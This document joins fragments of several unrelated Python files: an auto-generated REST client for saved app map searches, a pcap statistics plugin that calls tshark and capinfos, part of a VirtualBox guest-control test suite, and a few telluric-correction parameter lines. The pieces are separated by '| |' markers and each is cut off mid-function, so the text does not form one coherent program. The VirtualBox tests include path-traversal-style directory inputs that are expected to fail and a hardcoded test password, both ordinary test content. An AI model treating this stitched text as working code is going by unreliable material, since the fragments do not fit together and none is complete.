query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/owned', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_saved_app_map_search(self, id, **kwargs): # noqa: E501
"""Get a specific search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_saved_app_map_search(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
return data
def get_saved_app_map_search_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a specific search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_saved_app_map_search_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_saved_app_map_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_saved_app_map_search(self, id, **kwargs): # noqa: E501
"""Update a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_saved_app_map_search_with_http_info(id, **kwargs) # noqa: E501
return data
def update_saved_app_map_search_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a search # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_saved_app_map_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_saved_app_map_search_for_user(self, id, **kwargs): # noqa: E501
"""Update a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_for_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs) # noqa: E501
return data
def update_saved_app_map_search_for_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_for_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_saved_app_map_search_for_user" % key
)
params[key] = val
del params['kwargs']
# | |
<reponame>rashley-iqt/network-tools
"""
Plugin that takes pcap files and outputs stats
Created on 1 November 2019
@author: <NAME>
"""
from datetime import datetime
import json
import os
import shlex
import subprocess
import sys
import pika
from enchant.tokenize import get_tokenizer
from scapy.all import *
def striptxt_pcap(pcap):
tokenizer = get_tokenizer("en_US")
a = rdpcap(pcap)
sessions = a.sessions()
packet_count = 0
unencrypted_packet_count = 0
encrypted_packet_count = 0
encrypted_len = 0
unencrypted_len = 0
convs = {'Total Packets': 0, 'Plaintext Packets': 0, 'Encrypted Packets': 0, 'Plaintext Bytes': 0, 'Encrypted Bytes': 0, 'Plaintext Conversations':[], 'Encrypted Conversations':[]}
for session in sessions:
http_payload = b""
encrypted = 'unknown'
session_packets = 0
for packet in sessions[session]:
session_packets += 1
packet_count += 1
try:
payload = bytes(packet[TCP].payload)
payload = payload.decode('utf-8')
word_tuple = [w for w in tokenizer(payload)]
encrypted = 'Plaintext Conversations' if word_tuple else 'Encrypted Conversations'
if encrypted == 'Plaintext Conversations':
encrypted_len += len(packet[TCP].payload)
else:
unencrypted_len += len(packet[TCP].payload)
convs[encrypted].append(f'{packet[IP].src}:{packet[TCP].sport},{packet[IP].dst}:{packet[TCP].dport}')
except Exception as e:
pass
try:
payload = bytes(packet[UDP].payload)
payload = payload.decode('utf-8')
word_tuple = [w for w in tokenizer(payload)]
encrypted = 'Plaintext Conversations' if word_tuple else 'Encrypted Conversations'
if encrypted == 'Plaintext Conversations':
encrypted_len += len(packet[UDP].payload)
else:
unencrypted_len += len(packet[UDP].payload)
convs[encrypted].append(f'{packet[IP].src}:{packet[UDP].sport},{packet[IP].dst}:{packet[UDP].dport}')
except Exception as e:
pass
if encrypted == 'Plaintext Conversations':
unencrypted_packet_count += session_packets
elif encrypted == 'Encrypted Conversations':
encrypted_packet_count += session_packets
convs['Total Packets'] = packet_count
convs['Plaintext Packets'] = unencrypted_packet_count
convs['Encrypted Packets'] = encrypted_packet_count
convs['Plaintext Bytes'] = unencrypted_len
convs['Encrypted Bytes'] = encrypted_len
convs['Plaintext Conversations'] = list(set(convs['Plaintext Conversations']))
convs['Encrypted Conversations'] = list(set(convs['Encrypted Conversations']))
results = {'convcontents': convs}
print(results)
return results
def connect_rabbit(host='messenger', port=5672, queue='task_queue'):
params = pika.ConnectionParameters(host=host, port=port)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.queue_declare(queue=queue, durable=True)
return channel
def send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):
channel.basic_publish(exchange=exchange,
routing_key=routing_key,
body=json.dumps(msg),
properties=pika.BasicProperties(
delivery_mode=2,
))
print(" [X] %s UTC %r %r" % (str(datetime.utcnow()),
str(msg['id']), str(msg['file_path'])))
return
def get_version():
version = ''
with open('VERSION', 'r') as f:
for line in f:
version = line.strip()
return version
def get_path():
path = None
try:
path = sys.argv[1]
except Exception as e:
print("No path provided: {0}, quitting".format(str(e)))
return path
def parse_capinfos(output):
results = {'capinfos':{}}
num_interfaces = 0
interface_dict = {}
interface = 0
interface_name = ''
for line in output.split('\n'):
if line == '':
continue
if line.startswith('Number of interfaces in file:'):
num_interfaces = int(line.split(':', 1)[1].strip())
continue
if interface < num_interfaces:
if line.startswith('Interface '):
interface_name = line.split()[1]
interface_dict[interface_name] = {}
continue
else:
if line.startswith('Number of packets '):
interface += 1
name, value = line.split(' = ')
interface_dict[interface_name][name.strip()] = value.strip()
continue
name, value = line.split(':', 1)
results['capinfos'][name.strip()] = value.strip()
results['capinfos']['interfaces'] = interface_dict
print(results)
return results
def run_capinfos(path):
if os.path.getsize(path) == 0:
print("pcap file empty, no stats")
return
output = ''
try:
output = subprocess.check_output(shlex.split(' '.join(['capinfos', path])))
output = output.decode("utf-8")
except Exception as e:
print(str(e))
results = parse_capinfos(output)
return results
def get_asn(endpoint):
output = ''
try:
output = subprocess.check_output(shlex.split(' '.join(['bash', 'asn.sh', endpoint])))
output = output.decode("utf-8").strip()
except Exception as e:
print(str(e))
return output
def get_ether_vendor(mac, lookup_path='nmap-mac-prefixes.txt'):
"""
Takes a MAC address and looks up and returns the vendor for it.
"""
mac = ''.join(mac.split(':'))[:6].upper()
try:
with open(lookup_path, 'r') as f:
for line in f:
if line.startswith(mac):
return line.split()[1].strip()
except Exception as e: # pragma: no cover
return 'Unknown'
def parse_tshark(output):
results = {'tshark':{}}
in_block = False
name = None
for line in output.split('\n'):
if line.startswith('==='):
if in_block:
in_block = False
name = None
continue
else:
in_block = True
continue
if in_block:
if not name:
name = ''.join(line.split(':')).strip()
results['tshark'][name] = ''
continue
elif not line.startswith('Filter:') and line != '':
results['tshark'][name] += line + '\n'
for result in results['tshark'].keys():
if 'Conversations' in result:
# handle conversation parsing
conversations = []
for line in results['tshark'][result].split('\n'):
if line == '' or line.startswith(' '):
# header or padding, dicard
continue
else:
src, _, dst, frames_l, bytes_l, frames_r, bytes_r, frames_total, bytes_total, rel_start, duration = line.split()
conv = {'Source': src, 'Destination': dst, 'Frames to Source': frames_l, 'Bytes to Source': bytes_l, 'Frames to Destination': frames_r, 'Bytes to Destination': bytes_r, 'Total Frames': frames_total, 'Total Bytes': bytes_total, 'Relative Start': rel_start, 'Duration': duration}
if 'Ethernet' in result:
conv['Source Vendor'] = get_ether_vendor(src)
conv['Destination Vendor'] = get_ether_vendor(dst)
conversations.append(conv)
results['tshark'][result] = conversations
elif 'Endpoints' in result:
# handle endpoint parsing
endpoints = []
for line in results['tshark'][result].split('\n'):
if line == '' or line.startswith(' '):
# header or padding, dicard
continue
else:
# handle endpoint services with ports
if result.startswith('UDP') or result.startswith('TCP') or result.startswith('STCP'):
endpoint, port, packet_count, byte_count, tx_packets, tx_bytes, rx_packets, rx_bytes = line.split()
conv = {'Endpoint': endpoint, 'Port': port, 'Packets': packet_count, 'Bytes': byte_count, 'Tx Packets': tx_packets, 'Tx Bytes': tx_bytes, 'Rx Packets': rx_packets, 'Rx Bytes': rx_bytes}
else:
endpoint, packet_count, byte_count, tx_packets, tx_bytes, rx_packets, rx_bytes = line.split()
conv = {'Endpoint': endpoint, 'Packets': packet_count, 'Bytes': byte_count, 'Tx Packets': tx_packets, 'Tx Bytes': tx_bytes, 'Rx Packets': rx_packets, 'Rx Bytes': rx_bytes}
if 'Ethernet' in result:
conv['Endpoint Vendor'] = get_ether_vendor(endpoint)
endpoints.append(conv)
results['tshark'][result] = endpoints
else:
# handle weird stuff
for line in results['tshark'][result].split('\n'):
if line == '' or line.startswith(' '):
# header or padding, dicard
continue
else:
# handle icmp and icmpv6
if result.startswith('ICMP'):
if isinstance(results['tshark'][result], str):
results['tshark'][result] = {}
if line.startswith('Requests') or line.startswith('Minimum'):
# header
continue
else:
values = line.split()
if len(values) == 4:
requests, replies, lost, percent_loss = values
results['tshark'][result]['Requests'] = requests
results['tshark'][result]['Replies'] = replies
results['tshark'][result]['Lost'] = lost
results['tshark'][result]['% Loss'] = percent_loss
else:
minimum, maximum, mean, median, s_deviation, min_frame, max_frame = values
results['tshark'][result]['Minimum'] = minimum
results['tshark'][result]['Maximum'] = maximum
results['tshark'][result]['Mean'] = mean
results['tshark'][result]['Median'] = median
results['tshark'][result]['Standard Deviation'] = s_deviation
results['tshark'][result]['Minimum Frame'] = min_frame
results['tshark'][result]['Maximum Frame'] = max_frame
elif result.startswith('Protocol'):
# TODO
continue
# handle dns
elif result.startswith('DNS'):
# TODO
continue
# TODO temporarily remove until parsed
if 'DNS' in results['tshark']:
del results['tshark']['DNS']
# handle protocol hierarchy stats
a = []
if 'Protocol Hierarchy Statistics' in results['tshark']:
a = results['tshark']['Protocol Hierarchy Statistics'].split('\n')
h = []
for line in a:
if line != '':
name, frame_count, byte_count = line.rsplit(' ', 2)
name = name.rstrip()
frame_count = frame_count.split(':')[1]
byte_count = byte_count.split(':')[1]
h.append([name, frame_count, byte_count])
i = 1
spaces = 0
if h:
h[0][0] = '"' + h[0][0].strip()
while i < len(h):
prev_spaces = spaces
spaces = h[i][0].count(' ')
h[i-1][0] = h[i-1][0].strip() + '":{"Frames": "' + h[i-1][1] + '", "Bytes": "' + h[i-1][2]
if spaces > prev_spaces:
h[i-1][0] += '","'
elif spaces == prev_spaces:
h[i-1][0] += '"},"'
else:
h[i-1][0] += '"}' + ('}'*(prev_spaces-spaces)) + ',"'
i += 1
prev_spaces = spaces
spaces = h[-1][0].count(' ')
h[i-1][0] = h[i-1][0].strip() + '":{"Frames": "' + h[i-1][1] + '", "Bytes": "' + h[i-1][2] + '"}' + ('}'*(prev_spaces))
protocol_str = '{'
for record in h:
protocol_str += record[0]
protocol_str += '}'
results['tshark']['Protocol Hierarchy Statistics'] = json.loads(protocol_str)
# add in condensed conversation fields
results['tshark']['Condensed TCP Conversations'] = condense_conversations(results, 'TCP Conversations')
results['tshark']['Condensed UDP Conversations'] = condense_conversations(results, 'UDP Conversations')
print(results)
return results
def condense_conversations(results, conv_type):
prot_ip_map = {}
if conv_type in results['tshark']:
for conversation in results['tshark'][conv_type]:
src_ip, src_port = conversation['Source'].rsplit(':', 1)
dst_ip, dst_port = conversation['Destination'].rsplit(':', 1)
if src_ip not in prot_ip_map:
prot_ip_map[src_ip] = {'Destinations': [], 'Source Ports': [], 'Destination Ports': [], 'ASN': get_asn(src_ip)}
if src_port not in prot_ip_map[src_ip]['Source Ports']:
prot_ip_map[src_ip]['Source Ports'].append(src_port)
if dst_port not in prot_ip_map[src_ip]['Destination Ports']:
prot_ip_map[src_ip]['Destination Ports'].append(dst_port)
if dst_ip not in prot_ip_map[src_ip]['Destinations']:
prot_ip_map[src_ip]['Destinations'].append(dst_ip)
return prot_ip_map
def run_tshark(path):
if os.path.getsize(path) == 0:
print("pcap file empty, no stats")
return
results = {}
output = ''
try:
conv_endpoint_types = ['bluetooth', 'eth', 'fc', 'fddi', 'ip', 'ipv6', 'ipx', 'jxta', 'ncp', 'rsvp', 'sctp', 'tcp', 'tr', 'usb', 'udp', 'wlan']
options = '-n -q -z dns,tree -z io,phs -z icmp,srt -z icmpv6,srt'
options += ' -z conv,'.join(conv_endpoint_types)
options += ' -z endpoints,'.join(conv_endpoint_types)
output = subprocess.check_output(shlex.split(' '.join(['tshark', '-r', path, options])))
output = output.decode("utf-8")
except Exception as e:
print(str(e))
results = parse_tshark(output)
return results
if __name__ == '__main__': # pragma: no cover
path = get_path()
uid = ''
if 'id' in os.environ:
uid = os.environ['id']
if path:
if 'rabbit' in os.environ and os.environ['rabbit'] == 'true':
try:
channel = connect_rabbit()
capinfos_results = run_capinfos(path)
body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': capinfos_results, 'results': {'tool': 'pcap-stats', 'version': get_version()}}
send_rabbit_msg(body, channel)
tshark_results = run_tshark(path)
body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': tshark_results, 'results': {'tool': 'pcap-stats', 'version': get_version()}}
send_rabbit_msg(body, channel)
text_results = striptxt_pcap(path)
body = | |
which will be killed by VBoxService on the
# guest because it ran out of execution time (5 seconds).
if fRc:
try:
curProc = oGuestSession.processCreate(sImage, [sImage,] if self.oTstDrv.fpApiVer >= 5.0 else [], \
[], [], 5 * 1000);
reporter.log('Waiting for process 2 being started ...');
waitRes = curProc.waitForArray([ vboxcon.ProcessWaitForFlag_Start ], 30 * 1000);
if waitRes != vboxcon.ProcessWaitResult_Start:
reporter.error('Waiting for process 1 to start failed, got status %d');
fRc = False;
if fRc:
reporter.log('Waiting for process 2 to get killed because it ran out of execution time ...');
waitRes = curProc.waitForArray([ vboxcon.ProcessWaitForFlag_Terminate ], 30 * 1000);
if waitRes != vboxcon.ProcessWaitResult_Timeout:
reporter.error('Waiting for process 2 did not time out when it should, got wait result %d' \
% (waitRes,));
fRc = False;
if fRc:
reporter.log('Waiting for process 2 indicated an error, good');
if curProc.status != vboxcon.ProcessStatus_TimedOutKilled:
reporter.error('Status of process 2 wrong; excepted %d, got %d' \
% (vboxcon.ProcessStatus_TimedOutKilled, curProc.status));
fRc = False;
else:
reporter.log('Status of process 2 correct (%d)' % (vboxcon.ProcessStatus_TimedOutKilled,));
## @todo Add curProc.terminate() as soon as it's implemented.
except:
reporter.errorXcpt('Exception for process 2:');
fRc = False;
oGuestSession.close();
except:
reporter.errorXcpt('Could not handle session:');
fRc = False;
return (fRc, oTxsSession);
def testGuestCtrlDirCreate(self, oSession, oTxsSession, oTestVm):
"""
Tests creation of guest directories.
"""
if oTestVm.isWindows():
sUser = "Administrator";
else:
sUser = "vbox";
sPassword = "password";
if oTestVm.isWindows():
sScratch = "C:\\Temp\\vboxtest\\testGuestCtrlDirCreate\\";
aaTests = [];
if oTestVm.isWindows():
aaTests.extend([
# Invalid stuff.
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '' ),
tdTestResult(fRc = False) ],
# More unusual stuff.
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '..\\..\\' ),
tdTestResult(fRc = False) ],
[ tdTestDirCreate(sUser = sUser, sPassword = sPassword, sDirectory = '../../' ),
tdTestResult(fRc = False) ],
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = 'z:\\' ),
tdTestResult(fRc = False) ],
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '\\\\uncrulez\\foo' ),
tdTestResult(fRc = False) ],
# Creating directories.
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = sScratch ),
tdTestResult(fRc = False) ],
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = os.path.join(sScratch, 'foo\\bar\\baz'),
aFlags = [ vboxcon.DirectoryCreateFlag_Parents ] ),
tdTestResult(fRc = True) ],
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = os.path.join(sScratch, 'foo\\bar\\baz'),
aFlags = [ vboxcon.DirectoryCreateFlag_Parents ] ),
tdTestResult(fRc = True) ],
# Long (+ random) stuff.
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
sDirectory = os.path.join(sScratch,
"".join(random.choice(string.ascii_lowercase) for i in range(32))) ),
tdTestResult(fRc = True) ],
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
sDirectory = os.path.join(sScratch,
"".join(random.choice(string.ascii_lowercase) for i in range(128))) ),
tdTestResult(fRc = True) ],
# Following two should fail on Windows (paths too long). Both should timeout.
[ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
sDirectory = os.path.join(sScratch,
"".join(random.choice(string.ascii_lowercase) for i in range(255))) ),
tdTestResult(fRc = False) ],
[ tdTestDirCreate(sUser = sUser, sPassword = sPassword,
sDirectory = os.path.join(sScratch,
"".join(random.choice(string.ascii_lowercase) for i in range(1024)))
),
tdTestResult(fRc = False) ]
]);
else:
reporter.log('No OS-specific tests for non-Windows yet!');
fRc = True;
for (i, aTest) in enumerate(aaTests):
curTest = aTest[0]; # tdTestExec, use an index, later.
curRes = aTest[1]; # tdTestResult
reporter.log('Testing #%d, sDirectory="%s" ...' % (i, curTest.sDirectory));
curTest.setEnvironment(oSession, oTxsSession, oTestVm);
fRc, curGuestSession = curTest.createSession('testGuestCtrlDirCreate: Test #%d' % (i,));
if fRc is False:
reporter.error('Test #%d failed: Could not create session' % (i,));
break;
fRc = self.gctrlCreateDir(curTest, curRes, curGuestSession);
curTest.closeSession();
if fRc is False:
reporter.error('Test #%d failed' % (i,));
fRc = False;
break;
return (fRc, oTxsSession);
def testGuestCtrlDirCreateTemp(self, oSession, oTxsSession, oTestVm): # pylint: disable=R0914
"""
Tests creation of temporary directories.
"""
if oTestVm.isWindows():
sUser = "Administrator";
else:
sUser = "vbox";
sPassword = "password";
# if oTestVm.isWindows():
# sScratch = "C:\\Temp\\vboxtest\\testGuestCtrlDirCreateTemp\\";
aaTests = [];
if oTestVm.isWindows():
aaTests.extend([
# Invalid stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sDirectory = ''),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sDirectory = 'C:\\Windows',
fMode = 1234),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = '',
sDirectory = 'C:\\Windows', fMode = 1234),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'xXx',
sDirectory = 'C:\\Windows', fMode = 0700),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'xxx',
sDirectory = 'C:\\Windows', fMode = 0700),
tdTestResult(fRc = False) ],
# More unusual stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'foo',
sDirectory = 'z:\\'),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'foo',
sDirectory = '\\\\uncrulez\\foo'),
tdTestResult(fRc = False) ],
# Non-existing stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'bar',
sDirectory = 'c:\\Apps\\nonexisting\\foo'),
tdTestResult(fRc = False) ],
# FIXME: Failing test. Non Windows path
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'bar',
# sDirectory = '/tmp/non/existing'),
# tdTestResult(fRc = False) ]
]);
else:
reporter.log('No OS-specific tests for non-Windows yet!');
# FIXME: Failing tests.
# aaTests.extend([
# Non-secure variants.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'X',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'X',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0755),
# tdTestResult(fRc = True) ],
# Secure variants.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# Random stuff.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>,
# sTemplate = "XXX-".join(random.choice(string.ascii_lowercase) for i in range(32)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = "".join('X' for i in range(32)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = "".join('X' for i in range(128)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ]
# ]);
fRc = True;
for (i, aTest) in enumerate(aaTests):
curTest = aTest[0]; # tdTestExec, use an index, later.
curRes = | |
= pcheck(params, 'TELLUP_TRANS_SIGLIM', 'trans_siglim', kwargs,
func_name)
force_airmass = pcheck(params, 'TELLUP_FORCE_AIRMASS', 'force_airmass',
kwargs, func_name)
others_bounds = pcheck(params, 'TELLUP_OTHER_BOUNDS', 'others_bounds',
kwargs, func_name, mapf='list', dtype=float)
water_bounds = pcheck(params, 'TELLUP_WATER_BOUNDS', 'water_bounds', kwargs,
func_name, mapf='list', dtype=float)
ker_thres = pcheck(params, 'TELLUP_ABSO_EXPO_KTHRES', 'ker_thres', kwargs,
func_name)
